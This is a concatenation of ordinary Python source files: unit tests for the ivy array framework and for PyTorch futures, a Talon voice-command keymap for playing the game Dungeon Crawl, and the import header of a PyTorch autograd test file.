# cardinality test
if size:
assert ret.shape == (size,)
else:
assert ret.shape == tensor.shape
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates gives non-deterministic outputs
return
assert np.allclose(call(ivy.scatter_flat, inds, upd, size, tensor, red, dev),
np.asarray(ivy.functional.backends.numpy.scatter_flat(
ivy.to_numpy(inds), ivy.to_numpy(upd), size,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red)))
# scatter_nd
@pytest.mark.parametrize(
"inds_n_upd_n_shape_tnsr_n_wdup",
[([[4], [3], [1], [7]], [9, 10, 11, 12], [8], None, False), ([[0, 1, 2]], [1], [3, 3, 3], None, False),
([[0], [2]], [[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]],
[[5, 5, 5, 5], [6, 6, 6, 6], [7, 7, 7, 7], [8, 8, 8, 8]]], [4, 4, 4], None, False),
([[0, 1, 2]], [1], None, [[[1, 2, 3], [4, 5, 6], [7, 8, 9]],
[[4, 5, 6], [7, 8, 9], [1, 2, 3]],
[[7, 8, 9], [1, 2, 3], [4, 5, 6]]], False)])
@pytest.mark.parametrize(
"red", ['sum', 'min', 'max', 'replace'])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_scatter_nd(inds_n_upd_n_shape_tnsr_n_wdup, red, dtype, tensor_fn, dev, call):
# smoke test
if red in ('sum', 'min', 'max') and call is helpers.mx_call:
# mxnet does not support sum, min or max reduction for scattering
pytest.skip()
inds, upd, shape, tensor, with_duplicates = inds_n_upd_n_shape_tnsr_n_wdup
if ivy.exists(tensor) and call is helpers.mx_call:
# mxnet does not support scattering into pre-existing tensors
pytest.skip()
inds = ivy.array(inds, 'int32', dev)
upd = tensor_fn(upd, dtype, dev)
if tensor:
# pytorch variables do not support in-place updates
tensor = ivy.array(tensor, dtype, dev) if ivy.current_framework_str() == 'torch'\
else tensor_fn(tensor, dtype, dev)
ret = ivy.scatter_nd(inds, upd, shape, tensor, red, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
if shape:
assert tuple(ret.shape) == tuple(shape)
else:
assert tuple(ret.shape) == tuple(tensor.shape)
# value test
if red == 'replace' and with_duplicates:
# replace with duplicates gives non-deterministic outputs
return
ret = call(ivy.scatter_nd, inds, upd, shape, tensor, red, dev)
true = np.asarray(ivy.functional.backends.numpy.scatter_nd(
ivy.to_numpy(inds), ivy.to_numpy(upd), shape,
ivy.to_numpy(tensor) if ivy.exists(tensor) else tensor, red))
assert np.allclose(ret, true)
# gather
@pytest.mark.parametrize(
"prms_n_inds_n_axis", [([9, 8, 7, 6, 5, 4, 3, 2, 1, 0], [0, 4, 7], 0),
([[1, 2], [3, 4]], [[0, 0], [1, 0]], 1)])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather(prms_n_inds_n_axis, dtype, tensor_fn, dev, call):
# smoke test
prms, inds, axis = prms_n_inds_n_axis
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather(prms, inds, axis, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
assert ret.shape == inds.shape
# value test
assert np.allclose(call(ivy.gather, prms, inds, axis, dev),
np.asarray(ivy.functional.backends.numpy.gather(ivy.to_numpy(prms), ivy.to_numpy(inds), axis)))
# gather_nd
@pytest.mark.parametrize(
"prms_n_inds", [([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[0, 1], [1, 0]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1]], [[1, 0]]]),
([[[0.0, 1.0], [2.0, 3.0]], [[0.1, 1.1], [2.1, 3.1]]], [[[0, 1, 0]], [[1, 0, 1]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_gather_nd(prms_n_inds, dtype, tensor_fn, dev, call):
# smoke test
prms, inds = prms_n_inds
prms = tensor_fn(prms, dtype, dev)
inds = ivy.array(inds, 'int32', dev)
ret = ivy.gather_nd(prms, inds, dev)
# type test
assert ivy.is_array(ret)
# cardinality test
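# each index row of length inds.shape[-1] selects into the leading dimensions of
# prms, so those dimensions are consumed and the remaining ones are appended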
assert ret.shape == inds.shape[:-1] + prms.shape[inds.shape[-1]:]
# value test
assert np.allclose(call(ivy.gather_nd, prms, inds, dev),
np.asarray(ivy.functional.backends.numpy.gather_nd(ivy.to_numpy(prms), ivy.to_numpy(inds))))
# linear_resample
@pytest.mark.parametrize(
"x_n_samples_n_axis_n_y_true", [([[10., 9., 8.]], 9, -1, [[10., 9.75, 9.5, 9.25, 9., 8.75, 8.5, 8.25, 8.]]),
([[[10., 9.], [8., 7.]]], 5, -2,
[[[10., 9.], [9.5, 8.5], [9., 8.], [8.5, 7.5], [8., 7.]]]),
([[[10., 9.], [8., 7.]]], 5, -1,
[[[10., 9.75, 9.5, 9.25, 9.], [8., 7.75, 7.5, 7.25, 7.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_linear_resample(x_n_samples_n_axis_n_y_true, dtype, tensor_fn, dev, call):
# smoke test
x, samples, axis, y_true = x_n_samples_n_axis_n_y_true
x = tensor_fn(x, dtype, dev)
ret = ivy.linear_resample(x, samples, axis)
# type test
assert ivy.is_array(ret)
# cardinality test
x_shape = list(x.shape)
num_x_dims = len(x_shape)
axis = axis % num_x_dims
x_pre_shape = x_shape[0:axis]
num_vals = x.shape[axis]
x_post_shape = x_shape[axis+1:]
assert list(ret.shape) == x_pre_shape + [samples] + x_post_shape
# value test
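# y_true holds `samples` evenly spaced points spanning the original endpoint
# values along the resampled axis (endpoints included)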
y_true = np.array(y_true)
y = call(ivy.linear_resample, x, samples, axis)
assert np.allclose(y, y_true)
# exists
@pytest.mark.parametrize(
"x", [[1.], None, [[10., 9., 8.]]])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_exists(x, dtype, tensor_fn, dev, call):
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
ret = ivy.exists(x)
# type test
assert isinstance(ret, bool)
# value test
y_true = x is not None
assert ret == y_true
# default
@pytest.mark.parametrize(
"x_n_dv", [([1.], [2.]), (None, [2.]), ([[10., 9., 8.]], [2.])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_default(x_n_dv, dtype, tensor_fn, dev, call):
x, dv = x_n_dv
# smoke test
x = tensor_fn(x, dtype, dev) if x is not None else None
dv = tensor_fn(dv, dtype, dev)
ret = ivy.default(x, dv)
# type test
assert ivy.is_array(ret)
# value test
y_true = ivy.to_numpy(x if x is not None else dv)
assert np.allclose(call(ivy.default, x, dv), y_true)
# dtype
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", [None, 'float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype(x, dtype, tensor_fn, dev, call):
# smoke test
if call in [helpers.mx_call] and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype(x)
# type test
assert isinstance(ret, ivy.Dtype)
# dtype bits
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ivy.all_dtype_strs)
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_bits(x, dtype, tensor_fn, dev, call):
# smoke test
if ivy.invalid_dtype(dtype):
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
ret = ivy.dtype_bits(ivy.dtype(x))
# type test
assert isinstance(ret, int)
assert ret in [1, 8, 16, 32, 64]
# dtype_to_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_to_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dtype_as_str = ivy.dtype(x, as_str=True)
dtype_to_str = ivy.dtype_to_str(ivy.dtype(x))
# type test
assert isinstance(dtype_as_str, str)
assert isinstance(dtype_to_str, str)
# value test
assert dtype_to_str == dtype_as_str
# dtype_from_str
@pytest.mark.parametrize(
"x", [1, [], [1], [[0.0, 1.0], [2.0, 3.0]]])
@pytest.mark.parametrize(
"dtype", ['float16', 'float32', 'float64', 'int8', 'int16', 'int32', 'int64', 'bool'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array])
def test_dtype_from_str(x, dtype, tensor_fn, dev, call):
# smoke test
if call is helpers.mx_call and dtype == 'int16':
# mxnet does not support int16
pytest.skip()
if call is helpers.jnp_call and dtype in ['int64', 'float64']:
# jax does not support int64 or float64 arrays
pytest.skip()
if (isinstance(x, Number) or len(x) == 0) and tensor_fn == helpers.var_fn and call is helpers.mx_call:
# mxnet does not support 0-dimensional variables
pytest.skip()
x = tensor_fn(x, dtype, dev)
dt0 = ivy.dtype_from_str(ivy.dtype(x, as_str=True))
dt1 = ivy.dtype(x)
# value test
assert dt0 is dt1
def test_cache_fn(dev, call):
def func():
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn()
ret0_again = cached_fn()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly; the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)()
ret0_again = ivy.cache_fn(func)()
ret1 = func()
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
def test_cache_fn_with_args(dev, call):
def func(_):
return ivy.random_uniform()
# return a single cached_fn and then query this
cached_fn = ivy.cache_fn(func)
ret0 = cached_fn(0)
ret0_again = cached_fn(0)
ret1 = cached_fn(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# call ivy.cache_fn repeatedly; the new cached functions each use the same global dict
ret0 = ivy.cache_fn(func)(0)
ret0_again = ivy.cache_fn(func)(0)
ret1 = ivy.cache_fn(func)(1)
assert ivy.to_numpy(ret0).item() == ivy.to_numpy(ret0_again).item()
assert ivy.to_numpy(ret0).item() != ivy.to_numpy(ret1).item()
assert ret0 is ret0_again
assert ret0 is not ret1
# def test_framework_setting_with_threading(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# def thread_fn():
# ivy.set_framework('numpy')
# x_ = np.array([0., 1., 2.])
# for _ in range(2000):
# try:
# ivy.reduce_mean(x_)
# except TypeError:
# return False
# ivy.unset_framework()
# return True
#
# # get original framework string and array
# fws = ivy.current_framework_str()
# x = ivy.array([0., 1., 2.])
#
# # start numpy loop thread
# thread = threading.Thread(target=thread_fn)
# thread.start()
#
# # start local original framework loop
# ivy.set_framework(fws)
# for _ in range(2000):
# ivy.reduce_mean(x)
# ivy.unset_framework()
#
# assert not thread.join()
def test_framework_setting_with_multiprocessing(dev, call):
if call is helpers.np_call:
# Numpy is the conflicting framework being tested against
pytest.skip()
def worker_fn(out_queue):
ivy.set_framework('numpy')
x_ = np.array([0., 1., 2.])
for _ in range(1000):
try:
ivy.reduce_mean(x_)
except TypeError:
out_queue.put(False)
return
ivy.unset_framework()
out_queue.put(True)
# get original framework string and array
fws = ivy.current_framework_str()
x = ivy.array([0., 1., 2.])
# start numpy loop process
output_queue = multiprocessing.Queue()
worker = multiprocessing.Process(target=worker_fn, args=(output_queue,))
worker.start()
# start local original framework loop
ivy.set_framework(fws)
for _ in range(1000):
ivy.reduce_mean(x)
ivy.unset_framework()
worker.join()
assert output_queue.get_nowait()
# def test_explicit_ivy_framework_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# # store original framework string and unset
# fw_str = ivy.current_framework_str()
# ivy.unset_framework()
#
# # set with explicit handle caught
# ivy_exp = ivy.get_framework(fw_str)
# assert ivy_exp.current_framework_str() == fw_str
#
# # assert backend implemented function is accessible
# assert 'array' in ivy_exp.__dict__
# assert callable(ivy_exp.array)
#
# # assert joint implemented function is also accessible
# assert 'cache_fn' in ivy_exp.__dict__
# assert callable(ivy_exp.cache_fn)
#
# # set global ivy to numpy
# ivy.set_framework('numpy')
#
# # assert the explicit handle is still unchanged
# assert ivy.current_framework_str() == 'numpy'
# assert ivy_exp.current_framework_str() == fw_str
#
# # unset global ivy from numpy
# ivy.unset_framework()
# def test_class_ivy_handles(dev, call):
#
# if call is helpers.np_call:
# # Numpy is the conflicting framework being tested against
# pytest.skip()
#
# class ArrayGen:
#
# def __init__(self, ivyh):
# self._ivy = ivyh
#
# def get_array(self):
# return self._ivy.array([0., 1., 2.])
#
# # create instance
# ag = ArrayGen(ivy.get_framework())
#
# # create array from array generator
# x = ag.get_array()
#
# # verify this is not a numpy array
# assert not isinstance(x, np.ndarray)
#
# # change global framework to numpy
# ivy.set_framework('numpy')
#
# # create another array from array generator
# x = ag.get_array()
#
# # verify this is not still a numpy array
# assert not isinstance(x, np.ndarray)
# einops_rearrange
@pytest.mark.parametrize(
"x_n_pattern_n_newx", [([[0., 1., 2., 3.]], 'b n -> n b', [[0.], [1.], [2.], [3.]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_rearrange(x_n_pattern_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, new_x = x_n_pattern_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_rearrange(x, pattern)
true_ret = einops.rearrange(ivy.to_native(x), pattern)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_reduce
@pytest.mark.parametrize(
"x_n_pattern_n_red_n_newx", [([[0., 1., 2., 3.]], 'b n -> b', 'mean', [1.5])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_reduce(x_n_pattern_n_red_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, reduction, new_x = x_n_pattern_n_red_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_reduce(x, pattern, reduction)
true_ret = einops.reduce(ivy.to_native(x), pattern, reduction)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# einops_repeat
@pytest.mark.parametrize(
"x_n_pattern_n_al_n_newx", [([[0., 1., 2., 3.]], 'b n -> b n c', {'c': 2},
[[[0., 0.], [1., 1.], [2., 2.], [3., 3.]]])])
@pytest.mark.parametrize(
"dtype", ['float32'])
@pytest.mark.parametrize(
"tensor_fn", [ivy.array, helpers.var_fn])
def test_einops_repeat(x_n_pattern_n_al_n_newx, dtype, tensor_fn, dev, call):
# smoke test
x, pattern, axes_lengths, new_x = x_n_pattern_n_al_n_newx
x = tensor_fn(x, dtype, dev)
ret = ivy.einops_repeat(x, pattern, **axes_lengths)
true_ret = einops.repeat(ivy.to_native(x), pattern, **axes_lengths)
# type test
assert ivy.is_array(ret)
# cardinality test
assert list(ret.shape) == list(true_ret.shape)
# value test
assert np.allclose(ivy.to_numpy(ret), ivy.to_numpy(true_ret))
# profiler
# def test_profiler(dev, call):
#
# # ToDo: find way to prevent this test from hanging when run alongside other tests in parallel
#
# # log dir
# this_dir = os.path.dirname(os.path.realpath(__file__))
# log_dir = os.path.join(this_dir, '../log')
#
# # with statement
# with ivy.Profiler(log_dir):
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
#
# # start and stop methods
# profiler = ivy.Profiler(log_dir)
# profiler.start()
# a = ivy.ones([10])
# b = ivy.zeros([10])
# a + b
# profiler.stop()
# if call is helpers.mx_call:
# time.sleep(1) # required by MXNet for some reason
# container types
def test_container_types(dev, call):
cont_types = ivy.container_types()
assert isinstance(cont_types, list)
for cont_type in cont_types:
assert hasattr(cont_type, 'keys')
assert hasattr(cont_type, 'values')
assert hasattr(cont_type, 'items')
def test_inplace_arrays_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch']:
assert ivy.inplace_arrays_supported()
elif cur_fw in ['jax', 'tensorflow']:
assert not ivy.inplace_arrays_supported()
else:
raise Exception('Unrecognized framework')
def test_inplace_variables_supported(dev, call):
cur_fw = ivy.current_framework_str()
if cur_fw in ['numpy', 'mxnet', 'torch', 'tensorflow']:
assert ivy.inplace_variables_supported()
elif cur_fw in ['jax']:
assert not ivy.inplace_variables_supported()
else:
raise Exception('Unrecognized framework')
# @pytest.mark.parametrize(
# "x_n_new", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_update(x_n_new, tensor_fn, dev, call):
# x_orig, new_val = x_n_new
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# new_val = tensor_fn(new_val, 'float32', dev)
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_update(x_orig, new_val)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(x), ivy.to_numpy(new_val))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_dec", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_decrement(x_n_dec, tensor_fn, dev, call):
# x_orig, dec = x_n_dec
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# dec = tensor_fn(dec, 'float32', dev)
# new_val = x_orig - dec
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_decrement(x_orig, dec)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
# @pytest.mark.parametrize(
# "x_n_inc", [([0., 1., 2.], [2., 1., 0.]), (0., 1.)])
# @pytest.mark.parametrize(
# "tensor_fn", [ivy.array, helpers.var_fn])
# def test_inplace_increment(x_n_inc, tensor_fn, dev, call):
# x_orig, inc = x_n_inc
# if call is helpers.mx_call and isinstance(x_orig, Number):
# # MxNet supports neither 0-dim variables nor 0-dim inplace updates
# pytest.skip()
# x_orig = tensor_fn(x_orig, 'float32', dev)
# inc = tensor_fn(inc, 'float32', dev)
# new_val = x_orig + inc
# if (tensor_fn is not helpers.var_fn and ivy.inplace_arrays_supported()) or\
# (tensor_fn is helpers.var_fn and ivy.inplace_variables_supported()):
# x = ivy.inplace_increment(x_orig, inc)
# assert id(x) == id(x_orig)
# assert np.allclose(ivy.to_numpy(new_val), ivy.to_numpy(x))
# return
# pytest.skip()
crawl.py
from talon.voice import Context, Key, Rep, Str, press
ctx = Context('crawl', bundle='com.apple.Terminal', func=lambda app, win: 'crawl' in win.title)
import time
import threading
import string
from .std import alpha_alt
# alpha = {k: k for k in string.lowercase}
alpha = {}
alpha.update(dict(zip(alpha_alt, string.ascii_lowercase)))
alpha.update({'sky %s' % word: letter for word, letter in zip(alpha_alt, string.ascii_uppercase)})
alpha.update({'level %d' % k: str(k) for k in range(1, 30)})
# TODO: numbers are used for dungeon levels
# TODO: repeat numbers should change based on whether it was the same phrase?
# TODO: I don't want to put parens around top-level ORs
# TODO: ["next song", "roam"] should work.
# TODO: better debug
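# dictation helper: joins the recognized words with spaces and types them as literal text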
def Text(m):
Str(' '.join(map(str, m.dgndictation[0]._words)))(None)
keymap = {}
keymap.update(alpha)
keymap.update({
'(right hand | right angle | rangle)': '>',
'(left hand | left angle | leangle)': '<',
'minus': '-',
'plus': '+',
'bang': '!',
'dollar': '$',
'underscore': '_',
'up': 'k',
'down': 'j',
'left': 'h',
'right': 'l',
'upple': 'y',
'downle': 'b',
'upper': 'u',
'downer': 'n',
'way up': 'K',
'way down': 'J',
'way left': 'H',
'way right': 'L',
'way upple': 'Y',
'way downle': 'B',
'way upper': 'U',
'way downer': 'N',
'(escape | back)': Key('esc'),
'(enter | shock | ok)': Key('enter'),
'tarp': Key('tab'),
'(question mark | question | questo)': '?',
'(star | asterisk)': '*',
'(dot | period)': '.',
'(wander | explore | roam)': 'o',
'(rest | sleep)': '5',
'wait': '.',
'(inventory | invent)': 'i',
'auto': Key('tab'),
'fight': Key(' '.join(['tab'] * 10)),
'stand [and] fight': Key(' '.join(['shift-tab'] * 10)),
'eat [food]': 'e',
'(quaff | drink)': 'q',
'quiver': 'Q',
'reed': 'r',
'skills': 'm',
'(stats | attributes | (char | character) sheet)': '%',
'(god | piety | religion)': '^',
'pray': '>',
'speed': '@',
'shopping list': '$',
'cast': 'z',
'cast last': Key('z . enter'), 'recast': Key('z . enter'),
'cast (one | a)': 'za',
'cast (two | b)': 'zb',
'cast (three | c)': 'zc',
'cast (four | d)': 'zd',
'cast (five | e)': 'ze',
'cast (six | f)': 'zf',
'cast (seven | g)': 'zg',
'cast (eight | h)': 'zh',
'autocast one': Key('z a enter'),
'autocast two': Key('z b enter'),
'autocast three': Key('z c enter'),
'autocast four': Key('z d enter'),
'autocast five': Key('z e enter'),
'autocast six': Key('z f enter'),
'autocast seven': Key('z g enter'),
'autocast eight': Key('z h enter'),
'ability': 'a',
'(mutations | innate abilities)': 'A',
'talk': 't',
'shout': 'tt',
'wear': 'W',
'wield': 'w',
'switch weapon': '\'',
'(memorize | memo)': 'M',
'put on': 'P',
'take off': 'T',
'remove': 'R',
'drop': 'd',
# need a rule for letter, as well as this templated string form
# also, rule functions might need to be passed the entire context, or the chain of contexts that led to them
# 'drop <letter>': 'd {letter}',
'evoke': 'V',
'(evoke weapon | reach)': 'v',
'fire': 'f',
'(fire invent | fire inventory | fire item)': 'F',
'open': 'O',
'close': 'C',
'messages': Key('ctrl-p'),
'look down': ';',
'examine': 'x',
'map': 'X',
'visible [(items | features)]': Key('ctrl-x'),
'(get | grab | pick up)': 'g',
'find': Key('ctrl-f'),
'find plate': Key('ctrl-f p l a t e enter'),
'find armour': Key('ctrl-f a r m o u r enter'),
'find blade': Key('ctrl-f b l a d e enter'),
'find sword': Key('ctrl-f s w o r d enter'),
'find dagger': Key('ctrl-f d a g g e r enter'),
'find axe': Key('ctrl-f a x e enter'),
'find altar': Key('ctrl-f a l t a r enter'),
'find artifact': Key('ctrl-f a r t i f enter'),
'find brand': Key('ctrl-f b r a n d enter'),
'find corpse': Key('ctrl-f c o r p s e enter'),
'type <dgndictation>': Text,
'travel': 'G',
'travel [to] dungeon': 'Gd',
'travel [to] temple': 'Gt',
'travel [to] [(orc | orcish)] mines': 'Go',
'travel [to] lair': 'Gl',
'travel [to] swamp': 'Gs',
'travel [to] (spider nest | spider | nest)': 'Gn',
'travel [to] (slime pits | slime | pits)': 'Gm',
'travel [to] (elven halls | elven | halls)': 'Ge',
'travel [to] vaults': 'Gv',
'travel [to] depths': 'Gu',
'deepest': '$',
'down stairs': '>',
'up stairs': '<',
'yes': 'Y',
'no': 'N',
'(cut | chop)': 'c',
'all': 'a',
'edible': 'e',
'choosy': 'c',
'(adjust | rename)': '=',
'items': 'i',
'spells': 's',
'abilities': 'a',
'autopickup': Key('ctrl-a'),
'item knowledge': '\\',
# 'twice': Rep(1),
# 'thrice': Rep(2),
# 'times four': Rep(3),
# 'times five': Rep(4),
# 'times six': Rep(5),
# 'ten': Rep(9),
'(str | strength)': 's',
'(int | intel | intelligence)': 'i',
'(dex | dexterity)': 'd',
})
keymap.update({str(k): Rep(k - 1) for k in range(2, 11)})
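# NOTE: the block below is wrapped in a bare string literal, so it is parsed but
# never executed; it sketches a slow-step mode driven by a background thread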
'''
stepping = False
def stepthread():
global stepping
while stepping:
press('f6')
time.sleep(1)
def slowstep(j):
global stepping
stepping = True
threading.Thread(target=stepthread).start()
def stopstep(j):
global stepping
if stepping:
stepping = False
else:
press('esc')
keymap.update({
'slow step': slowstep,
'halt': stopstep,
})
'''
ctx.keymap(keymap)
test_futures.py
import threading
import time
import torch
from torch.futures import Future
from torch.testing._internal.common_utils import TestCase, TemporaryFileName
def add_one(fut):
return fut.wait() + 1
class TestFuture(TestCase):
def test_wait(self):
f = Future()
f.set_result(torch.ones(2, 2))
self.assertEqual(f.wait(), torch.ones(2, 2))
def test_wait_multi_thread(self):
def slow_set_future(fut, value):
time.sleep(0.5)
fut.set_result(value)
f = Future()
t = threading.Thread(target=slow_set_future, args=(f, torch.ones(2, 2)))
t.start()
self.assertEqual(f.wait(), torch.ones(2, 2))
t.join()
def test_mark_future_twice(self):
fut = Future()
fut.set_result(1)
with self.assertRaisesRegex(
RuntimeError,
"Future can only be marked completed once"
):
fut.set_result(1)
def test_pickle_future(self):
fut = Future()
errMsg = "Can not pickle torch.futures.Future"
with TemporaryFileName() as fname:
with self.assertRaisesRegex(RuntimeError, errMsg):
torch.save(fut, fname)
def test_then(self):
fut = Future()
then_fut = fut.then(lambda x: x.wait() + 1)
fut.set_result(torch.ones(2, 2))
self.assertEqual(fut.wait(), torch.ones(2, 2))
self.assertEqual(then_fut.wait(), torch.ones(2, 2) + 1)
def test_chained_then(self):
fut = Future()
futs = []
last_fut = fut
for _ in range(20):
last_fut = last_fut.then(add_one)
futs.append(last_fut)
fut.set_result(torch.ones(2, 2))
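# each chained callback adds 1, so the i-th future in the chain resolves to the
# original tensor plus (i + 1)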
for i in range(len(futs)):
self.assertEqual(futs[i].wait(), torch.ones(2, 2) + i + 1)
def _test_error(self, cb, errMsg):
fut = Future()
then_fut = fut.then(cb)
fut.set_result(5)
self.assertEqual(5, fut.wait())
with self.assertRaisesRegex(RuntimeError, errMsg):
then_fut.wait()
def test_then_wrong_arg(self):
def wrong_arg(tensor):
return tensor + 1
self._test_error(wrong_arg, "unsupported operand type.*Future.*int")
def test_then_no_arg(self):
def no_arg():
return True
self._test_error(no_arg, "takes 0 positional arguments but 1 was given")
def test_then_raise(self):
def raise_value_error(fut):
raise ValueError("Expected error")
self._test_error(raise_value_error, "Expected error")
def test_collect_all(self):
fut1 = Future()
fut2 = Future()
fut_all = torch.futures.collect_all([fut1, fut2])
def slow_in_thread(fut, value):
time.sleep(0.1)
fut.set_result(value)
t = threading.Thread(target=slow_in_thread, args=(fut1, 1))
fut2.set_result(2)
t.start()
res = fut_all.wait()
self.assertEqual(res[0].wait(), 1)
self.assertEqual(res[1].wait(), 2)
t.join()
def test_wait_all(self):
fut1 = Future()
fut2 = Future()
# No error version
fut1.set_result(1)
fut2.set_result(2)
res = torch.futures.wait_all([fut1, fut2])
print(res)
self.assertEqual(res, [1, 2])
# Version with an exception
def raise_in_fut(fut):
raise ValueError("Expected error")
fut3 = fut1.then(raise_in_fut)
with self.assertRaisesRegex(RuntimeError, "Expected error"):
torch.futures.wait_all([fut3, fut2])
test_autograd.py
import gc
import sys
import io
import math
import random
import tempfile
import time
import threading
import unittest
import warnings
from copy import deepcopy
from collections import OrderedDict
from itertools import product, permutations
from operator import mul
from functools import reduce, partial
import torch
from torch import nn
from torch._six import inf, nan
from torch.autograd.function import once_differentiable
from torch.autograd.profiler import (profile, format_time, EventList,
FunctionEvent, FunctionEventAvg,
record_function, emit_nvtx)
import torch.autograd.functional as autogradF
from torch.utils.checkpoint import checkpoint
from torch.testing._internal.common_cuda import TEST_CUDA
from torch.testing._internal.common_utils import (TestCase, run_tests, skipIfNoLapack,
suppress_warnings, slowTest,
load_tests,
IS_WINDOWS, IS_MACOS, CudaMemoryLeakCheck,
TEST_WITH_ROCM, disable_gc,
gradcheck, gradgradcheck, make_tensor)
from torch.autograd import Variable, Function, detect_anomaly, kineto_available
